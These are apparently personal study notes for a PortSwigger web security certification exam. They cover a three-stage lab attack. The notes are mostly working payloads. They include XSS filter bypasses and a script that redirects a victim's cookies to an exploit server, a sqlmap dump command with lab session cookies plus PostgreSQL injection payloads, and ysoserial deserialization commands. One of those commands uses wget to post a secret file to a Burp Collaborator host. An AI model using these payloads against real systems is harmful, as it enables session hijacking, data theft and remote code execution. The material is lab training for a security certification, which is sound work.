For details of the exam and labs, go to https://portswigger.net/web-security/certification/how-it-works
EXAM PREP 1/3: XSS
1. DOM XSS in lookup function
- to find it, send lookup to intruder, burp scanner will raise it as DOM OR not DOM XSS. The vuln js is at 'resources/js/searchResults.js'
- Chrome "untrusted types" plugin will show reflected vuln eval payload statement in use in console tab!
It will show the js payload to inject to complete the popup statement:
var searchResultsObj = {"results":[],"searchTerm":""-alert(1)-""}
- Possible payloads at the search function are: (refer to Lab Reflected DOM XSS)
\\"-alert(1)}//
OR
"-alert(1)-"
- notes: https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- Highly recommended to install https://github.com/filedescriptor/untrusted-types for Chrome, useful to look for dangerous sinks such as eval. Eg:
- "-alert(document.cookie)-" will be blocked by server, can be seen in network tab in devtools, need to find bypass, google it.
to bypass document.cookie filter use this trick:
\\"-alert(window["document"]["cookie"])}//
OR
"-alert(window["document"]["cookie"])-"
*go to https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ for more info*
* use "untrusted types" chrome plugin to help you get the right bypass syntax*
- to send the victim cookie to attacker server and to evade eval filter encode the dots in url format %2e:
\\"-(window["document"]["location"]="https://exploit-ac271f041e05294980199d1901ad0098%2eweb-security-academy%2enet/?"+window["document"]["cookie"])}//
OR
"-(window["document"]["location"]="https://exploit-ace61f411f22344280191eb3016d00ea%2eweb-security-academy%2enet//?"+window["document"]["cookie"])-"
- Host this js script on exploit server, taken from "Lab: Reflected XSS into HTML context with all tags blocked except custom ones". The url in exploit server must be uri encoded completely.
<script>
location='https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/?lookup=%5C%5C%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ac271f041e05294980199d1901ad0098%252eweb-security-academy%252enet%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29%7D%2F%2F';
</script>
OR
!! NOTE: they interchange search_term or lookup or someshit...watch out!!
<script>
location='https://ac701f751f8f348b80171ec10036004a.web-security-academy.net/?search_term=%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ace61f411f22344280191eb3016d00ea%252eweb-security-academy%252enet%2F%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29-%22';
</script>
- obtain session cookie for carlos and login. You are done with 1/3. Now time to access the admin panel!
EXAM PREP 2/3 SQLi
2. use burp scanner to scan for SQLi.
- insertion point at the 'SortBy=DATE' param, put a * and feed it into sqlmap like a pro hacker:
https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE'&blogger=
- use sqlmap to extract.
sqlmap -u "https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE*&blogger=" --cookie="_lab=46%7cMCwCFG2IfeQ5CHUndYpTAPtmGpE8MZRHAhROekAjQ2%2bFoBDYXnQhjEaI0TGBCTenrDuN8SmGoEzablVpLkdA07iiBE72yehRPHxSL5BW4bAUUq1m6Apg%2fO6jwIIPOjCU4qfFuoNCIz9S%2f7Nk12%2fOvm4C7BmOU4QbEYLOdPrZgIGUCe0%3d; session=DtX3UfneU9ZTeTlU20TY7lUzRj7DEhCL" --dump
- Based on sqlmap, the PostgreSQL injections are:
Parameter: #1* (URI)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT (CASE WHEN (9975=9975) THEN 9975 ELSE 1/(SELECT 0) END))&blogartist=
Type: error-based
Title: PostgreSQL error-based - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(CAST((CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4363=4363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC))&blogartist=
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=DATE;SELECT PG_SLEEP(5)--&blogartist=
Type: time-based blind
Title: PostgreSQL > 8.1 time-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT 5932 FROM PG_SLEEP(5))&blogartist=
- use the following manual SQLi to get the admin passwd:
????????
- extract administrator password and delete user carlos from admin panel.
EXAM PREP 3/3 SERIALIZED
3. serialization at admin-prefs cookie! Bug can be detected using Burp scanner
- payload is base64 + gzip. Use Burp 'Deserialization scanner' plugin to test and confirm gadget. It will detect the following:
Apache Commons Collections 3 Alternate payload 2 (Sleep): Potentially VULNERABLE!!!
Commons BeanUtils (Sleep): Potentially VULNERABLE!!!
Apache Commons Collections 3 Alternate payload 3 (Sleep): Potentially VULNERABLE!!!
!!ALL FALSE+, NEED TO TEST YOURSELF, LOOK IN BURP SCANNER OUTPUT!!
- please do this in Kali!! Need ysoserial.jar
- refer to Lab: Exploiting Java deserialization with Apache Commons
Eg:
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'cat /home/carlos/secret' | base64
- They blocked backticks, so don't try to exfiltrate OOB via DNS or wget. Eg 'host `cat /home/carlos/secret`.xxxxx.burpcollaborator.net. It won't work!
- Commons Collections 5
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'wget --post-file /home/carlos/secret 57atjr760eg9rmvtk7hwu2ho4fa68ux.burpcollaborator.net' | gzip -f | base64 -w0
- https://notsosecure.com/oob-exploitation-cheatsheet/
- need to OOB the /home/carlos/secret in wget request, output will be visible in burp collab.
3/3 completed
